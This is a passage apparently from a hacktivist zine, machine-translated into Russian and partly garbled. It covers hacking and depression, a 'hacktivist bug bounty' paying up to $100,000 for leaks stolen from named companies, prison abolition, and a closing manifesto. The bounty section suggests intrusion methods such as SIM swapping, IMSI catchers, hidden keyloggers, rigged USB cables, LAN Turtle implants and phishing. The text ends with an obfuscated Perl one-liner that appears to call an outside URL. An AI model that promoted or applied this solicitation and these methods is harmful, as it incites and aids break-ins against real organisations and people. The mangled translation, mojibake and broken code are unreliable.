https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
Хаммонд-враг-государства-183599 /
Этот чувак и взлом HBGary были источником вдохновения
* Дни войны, ночи любви - Crimethinc
* Момо - Майкл Энде
* Письма молодому поэту - Рильке
* Доминион (документальный)
«Мы не можем поверить, что если мы не посмотрим, то не произойдет того, чего мы не хотим видеть»
- Толстой в ПервР° ятупень
* Bash Back!
- [13 - Исцеление] ------------------------------------------- - --------------------
В мире хакеров часто бывает депрессия, самоубийства и некоторые
битвы с психическим здоровьем. Не думаю, что это из-за взлома, а из-за
среда, из которой в основном происходят хакеры. Как и многие
хакеры, я рос с небольшим человеческим контактом: я был ребенком, воспитанным Интернетом.
Я борюсь с депрессией и эмоциональным онемением. Вилли Саттон
Его часто цитируют, говоря, что он грабил банки, потому что «вот где он
деньги ", но цитата неверна. На самом деле он сказал следующее:
Зачем грабили банки? Потому что ему это понравилось. Он любил это делать. Я был больше
Я живу, когда был в банке, в разгар ограбления, что в любом
еще один момент моей жизни. Ему так понравилось, что через неделю или две
Я уже искал следующую возможность. Но для меня деньги были
мелочи, не более того.
Взлом заставил меня почувствовать себя живым. Это началось как способ самолечения
депрессия. Позже я понял, что на самом деле его можно использовать для изготовления
что-то положительное. Я нисколько не жалею, как вырос, принес несколько
прекрасных переживаний в моей жизни. Но я знал, что не могу жить дальше
сюда. Поэтому я стал проводить больше времени вдали от компьютера,
другие люди, учатся открываться миру, чувствовать свои эмоции,
общайтесь с другими, принимайте риски и будьте уязвимы. Намного больше вещей
Трудно взломать, но результат того стоит. По-прежнему
Это требует усилий, но даже если это медленно и шатко, я чувствую, что
Я иду правильным путем.
Взлом, совершенный с совестью, тоже может нас лечить. Согласно
Мудрость майя, у нас есть дар, подаренный природой, который мы должны
поймите, чтобы поставить его на службу обществу. В [1] поясняется:
Когда человек не принимает свою работу или миссию, он начинает страдать
болезни, очевидно неизлечимые; хотя он не скоро умрет
время, но страдает только с целью проснуться или принять
совесть. Вот почему так важно, чтобы человек, получивший
знаний и выполняет свою работу в сообществах, должен платить свои Toj и
поддерживать постоянную связь с Создателем и его ruw¤ch qЂ ij, поскольку
ему постоянно нужны их сила и энергия. Иначе,
болезни, которые заставили вас отреагировать или принять работу, могут
чтобы снова нанести ущерб.
Если вы чувствуете, что взлом подпитывает вашу изоляцию, депрессию или другие
недуги, дыши. Найдите время, чтобы узнать себя и осознать. Ты
вы заслуживаете счастья, здоровья и полноты.
________________________
<Все коровы прекрасны>
------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
[1] Рюксе эль-майаб Кашлемал: корень и дух знания майя.
https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
- [14 - Программа поиска ошибок хактивистов] ------------------------------
Мне кажется, что взлом для получения и фильтрации документов, представляющих общественный интерес, - это
один из лучших способов использования хакерами своих навыков в
пользу общества. К несчастью для нас, хакеров, как почти
каждый пункт, порочные стимулы нашей экономической системы не совпадают
с чем приносит пользу обществу. Итак, это шоу - моя попытка
позволяют хорошим хакерам зарабатывать на жизнь честно
разоблачение материалов, представляющих общественный интерес, вместо того, чтобы ходить
продавать свою работу службам кибербезопасности, киберпреступности или
кибер война. Среди некоторых примеров компаний, утечки которых я хотел бы
платят горнодобывающие, лесозаготовительные и животноводческие компании, грабящие наши
прекрасная Латинская Америка (и они убивают защитников земли и территории
пытается остановить их), компании, участвующие в атаках на Рожаву, такие как Байкар
Makina или Havelsan, компании наблюдения, такие как группа NSO, преступники из
война и хищные птицы, такие как Blackwater и Halliburton, тюремные компании
частные компании, такие как GeoGroup и CoreCivic / CCA, и корпоративные лоббисты, такие как ALEC.
Обратите внимание при выборе места для исследования. Например, это нормально
известно, что нефтяные компании злы: они разбогатели ценой уничтожения
планете (а еще в 80-х сами компании уже знали о последствиях
своей деятельности [1]). Но если вы взломаете их напрямую, вам придется нырять между
невероятное количество скучной информации об их деятельности
ежедневно. Скорее всего, вам будет намного проще что-то найти
Интересно, если вместо этого вы сосредоточитесь на своих лоббистах [2]. Другой способ
выбор жизнеспособных целей - это чтение репортажей журналистов из
исследования (например, [3]), которые интересны, но не имеют доказательств
твердый. И это именно то, что могут найти ваши хаки.
Я заплачу до 100000 долларов за каждую утечку этого типа, в зависимости от интереса
публичность и влияние материала, и работа, необходимая для взлома. разумеется
что полная утечка документов и внутренних коммуникаций
некоторые из этих компаний принесут обществу выгоду, превышающую
те сто тысяч, но я не пытаюсь никого обогатить. Я просто хочу предоставить
достаточно средств, чтобы хакеры могли прилично зарабатывать на жизнь
делает хорошую работу. Из-за нехватки времени и
безопасность Я не буду открывать материал или проверять его сам, но
Я прочитаю, что о нем говорят в прессе, после того, как он будет опубликован, и я сделаю
оценка общественного интереса оттуда. Моя контактная информация
в конце руководства, упомянутого ранее [4].
Как получить материал, зависит от вас. Можно использовать традиционные техники
взлома, описанного в этом и предыдущем руководстве [4]. Вы могли бы сделать его симом
обменять [5] на коррумпированного бизнесмена или политика, а затем загрузить их электронные письма и
резервные копии из облака. Вы можете заказать улавливатель IMSI на alibaba и использовать его на улице
из своих офисов. Вы можете немного повозиться с войной (старым или новым
[6]). Вы можете быть человеком в их организации, у которого уже есть
доступ. Вы можете выбрать стиль старой школы с низким уровнем технологий, как в [7] и [8], и
просто проникните в их офисы. Все, что вам подходит.
[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
Сентябрь / 19 / shell-and-exxons-secret-1980-е-предупреждения-изменения-климата
[2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
[4] https://www.exploit-db.com/papers/41914
[5] https://www.vice.com/en_us/article/vbqax3/
хакеры-сим-своппинг-кража-номера-телефона-instagram-биткойн
[6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
это моя клавиатура /
[7] https://en.wikipedia.org/wiki/Citizens'_Commission_to_Investigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unneeded_Fuss
---- [14.1 - Частичные платежи] ---------------------------------------- ----------
Вы добросердечная официантка, которая работает в плохой компании [1]?
Не могли бы вы внедрить физический кейлоггер в
компьютер руководителя, чтобы поменять свой USB-кабель для зарядки на модифицированный
[2], спрячьте микрофон в конференц-зале, где они планируют свои
зверств, или оставить одно из них [3] забытым в каком-нибудь уголке
Офисы?
[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle
Вы хорошо разбираетесь в социальной инженерии и фишинге, и у вас есть оболочка
компьютер сотрудника, или таким образом вы получили его учетные данные vpn
используя фишинг? Но, возможно, вам не удалось получить администратора домена и скачать
что ты хочешь?
ВїВы участвовали в программах bug bounties и стали экспертом в
взлом веб-приложений, но у вас недостаточно хакерского опыта
полностью проникнуть в компанию?
У вас есть объект с реверс-инжинирингом? Сканируйте некоторые злые компании
чтобы узнать, какие устройства они подключили к Интернету (брандмауэр, vpn и
почтовые шлюзы будут намного полезнее, чем такие вещи, как камеры
IP), перепроектируйте их и найдите все уязвимости, которые можно использовать.
удаленная форма.
Если я могу работать с вами, чтобы проникнуть в компанию и получить материал
представляющих общественный интерес, вы все равно будете вознаграждены за свою работу. Если не
У меня есть время поработать сам, по крайней мере постараюсь вам посоветовать
о том, как продолжить, пока вы не сможете выполнить взлом самостоятельно.
Поддерживать власть имущих, чтобы взламывать и контролировать диссидентов, активистов и
На население в целом сегодня приходится промышленность в несколько миллиардов долларов.
долларов, а взлом и разоблачение власть имущих -
добровольная и рискованная работа. Превратите это в многомиллионную индустрию
долларов, конечно же, не исправит этот дисбаланс сил и не поможет
решать проблемы общества. Но я думаю, это будет весело. Так
это ... Я уже хочу, чтобы люди начали собирать свои награды!
- [15 - Отменить тюрьмы] ----------------------------------------- - ------
Создан врагом, чтобы заключать идеи
запирать товарищей, чтобы заглушить боевые кличи
это центр пыток и уничтожения
где человек становится более жестоким
Это отражение общества, репрессивного и тюремного.
устойчивый и основанный на авторитарной логике
охраняемый репрессированный и охраняемый
тысячи жертв и пленных истреблены
перед этой шизофренической и безжалостной машиной
партнер Аксель Осорио дает пелу на трости
нарушение изоляции и молчания
огонь и войну в тюрьму мы уничтожаем!
Rap Insurrecto - Противоречивые слова
Было бы типично закончить хакерский журнал, сказав: "Бесплатно, хаммонд, бесплатно"
комплектование экипажа, освобождение хамзы, освобождение задержанных для монтажа шпангоута,
и т.п. Я собираюсь довести эту традицию до ее наиболее радикальных последствий [1] и сказать:
Тюрьмы должны быть отменены прямо сейчас! Я сам преступник, они могут
думать, что происходит то, что у меня немного искаженный взгляд на этот вопрос.
А если серьезно, это даже не спорный вопрос, даже ООН
практически согласен [2]. Итак, раз и навсегда освободите людей
мигранты [3] [4] [5] [6], часто заключенные в тюрьму теми же странами, которые создали
войны и экологические и экономические разрушения, от которых они спасаются. Бесплатно
все сидящие в тюрьме за войну с наркопотребителями [7].
Освободить всех людей, заключенных в тюрьму за войну с бедными [8].
Единственное, что делают тюрьмы, - это скрывают и игнорируют доказательства
наличие социальных проблем, а не их решение. Y
пока все не будут освобождены, сражайтесь с тюремной системой, помня и
имея в виду тех, кто попал в ловушку. Отправить им любовь
письма, вертолеты [9], пиратские радиоприемники [10] и книги, и поддерживает тех, кто
организовать оттуда [11] [12].
[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
Davis-Are-Obsolete-Prisons-Final.pdf
[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/
США-иммиграционный центр-центр-рождество-Санта-список желаний
[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
изображения-Tucson-Arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Spain_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
австралия-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. Неоплаченный штраф: https://scielo.conicyt.cl/scielo.php?script=
sci_arttext & pid = S0718-00122012000100005
[9] стр. 10, Клевета NВє2. Политический бюллетень из тюрьмы строгого режима
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/fam-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/
- [16 - Заключение] ------------------------------------------- - ---------------
Наш мир перевернут [1]. У нас есть система правосудия, которая
представляет собой несправедливость. Закон и порядок созданы, чтобы создать иллюзию
социальный мир и скрывают систематическую и глубокую эксплуатацию,
насилие и несправедливость. Лучше следовать своей совести, а не закону.
[1] http://resistir.info/livros/galeano_patas_arriba.pdf
Бизнесмены богатеют, плохо обращаясь с людьми и планетой,
в то время как работа по уходу в основном не оплачивается. Сквозь
Нападение на все общественное, как-то мы построили города плотно
населены, страдают от одиночества и изоляции. Культурная система,
политическая и экономическая, в которой мы живем, поощряет худшие стороны природы
человек: жадность, эгоизм и эгоизм, соперничество, отсутствие
сострадание и привязанность к власти. Итак, для тех, кто получил
оставайся чутким и сострадательным в холодном мире ко всем героиням
обычных людей, которые проявляют доброту в мелочах, для всех, кто
В их сердцах до сих пор пылает горящая звезда: роза, роза, роза.
Вещь!
_____________________
<Давайте вместе споём! >
---------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
Открытое сердце
Открытое чувство
Открой свое понимание
Отложите причину в сторону
И пусть солнце, скрытое внутри тебя, светит
perl -Mre = eval << \ EOF
''
= ~ (
'(?'
. '{'. (
'' '|'% '
). ("\ [" ^
'-'). ('`' |
'!'). (" \` "|
','). '"(\\ $'
. ': = ``'. (('`') |
'#'). ('[' ^ '.').
('[' ^ ')'). ("\` "|
','). ('{' ^ '[').'- '. (' ['^' ('). (' {'^' ['). (' '' | '('). ( '[' ^ '/'). ('[' ^ '/'). (
'[' ^ '+'). ('[' ^ '('). ': //'. ('' '|'% '). (' '' | '.'). ('' '| ','). ('`' | '!'). (" \ `" |
'#'). ('' '|'% '). (' ['^'! '). (' '' | '!'). ('[' ^ '+'). ('' '| '!'). ('[' ^ "\ /"). (
'' '|') '). (' ['^' ('). (' ['^' / '). (' '' | '!'). '.'. ('' '|'% '). (' ['^'! ')
. ('`' | ','). ('`' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('' '| "\").
'.'. ('`' | '-'). ('[' ^ '#'). '/'. ('[' ^ '('). ('' '| (' $ ')). (
'[' ^ '('). ('`' | ',') .'- '. (' '' | '%'). ('[' ^ ('(')).
'/ `) = ~'. ('[' ^ '('). '| </'. ('[' ^ '+'). '> | \\'
. '\\'. ('`' | '.'). '|'. ('`' | "'").'; '.
'\\ $: = ~'. ('[' ^ '('). '/ <. *?> //'
. ('`' |" '").'; '. (' ['^' + '). (' ['^
')'). ('`' | ')'). ('`' | '.'). (('[') ^
'/').('['^'[').'\\$:=~/('.(('('(')^)
'('). ('`` ^'% '). (' {'^' # '). (' {'^' / ')
. ('`` ^'! ').'. *? '. (' `` '^' - '). (' `` | '%')
. ('[' ^ '#'). ("\` "| ')'). ('`' | '#'). (
'`|'! '). ('` `| '.'). ('`' | '/')
. '..) /'. ('[' ^ '('). '"})')
; $: = "\." ^ '~'; $ ~ = '@'
| '('; $ ^ = ')' ^ '[';
$ / = '``' | '.';
$, = '('
EOF
Мы родились из ночи.
мы живем в нем, мы взламываем его.
Вот и мы, достоинство мятежное,
Забытое сердце Р ?? РЅС‚РµСЂРЅРµС ‚.
Наша борьба за память и справедливость,
а в плохом правительстве полно преступников и убийц.
Наша борьба за честную и достойную работу,
а плохое правительство и корпорации покупают и продают нулевые дни.
Для всех завтра.
Для нас радостное восстание утечек
и экспроприация.
Для всего и всего.
Ничего для нас.
С гор кибернетического юго-востока,
_ _ _ ____ _ _
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
